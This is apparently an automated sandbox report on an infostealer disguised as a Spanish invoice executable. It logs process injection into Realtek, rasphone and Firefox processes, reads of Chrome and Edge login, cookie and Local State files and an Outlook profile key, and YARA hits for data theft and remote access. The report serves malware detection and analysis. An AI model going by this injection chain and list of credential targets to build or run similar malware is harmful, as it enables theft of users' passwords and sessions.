Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	NtResumeThread: Indirect: 0x36443E49			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x6E9511			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	NtSetContextThread: Indirect: 0x36443809			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x6E253E			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x7FF8F0B42651			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x6E965C			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x491E716			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtProtectVirtualMemory: Direct from: 0x6EAB94			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtCreateThreadEx: Direct from: 0x6E0AD8			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtResumeThread: Direct from: 0x4916B5F			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtAllocateVirtualMemory: Direct from: 0x6ED3D9			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x4916919			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	NtClose: Indirect: 0x3643F632
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x6E16D2			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	NtQueueApcThread: Indirect: 0x3643F5A7			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtClose: Direct from: 0x6E97A2
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtQueryInformationToken: Direct from: 0x6E1E40			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x6E24CB			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDeviceIoControlFile: Direct from: 0x6E9704			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	NtDelayExecution: Direct from: 0x4916AE8			Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Section loaded: NULL target: C:\Windows\SysWOW64\rasphone.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write			Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Thread register set: target process: 6480			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Thread register set: target process: 6480			Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Jump to behavior

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe	Process created: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe "C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe"			Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Process created: C:\Windows\SysWOW64\rasphone.exe "C:\Windows\SysWOW64\rasphone.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"			Jump to behavior

Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: RAVCpl64.exe, 00000003.00000000.84330780101.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.88174969866.0000000000E41000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program ManagerI/g

Language, Device and Operating System Detection

Source: C:\Users\user\Desktop\FACTURA PROFORMA MATRICULACI#U00d3N.exe

Code function: 0_2_0040351C EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,

0_2_0040351C

Stealing of Sensitive Information

Source: Yara match	File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\rasphone.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State			Jump to behavior
Source: C:\Windows\SysWOW64\rasphone.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State			Jump to behavior

Source: C:\Windows\SysWOW64\rasphone.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Source: Yara match	File source: 00000002.00000002.84425926740.0000000036460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.84737968184.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.84737857706.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY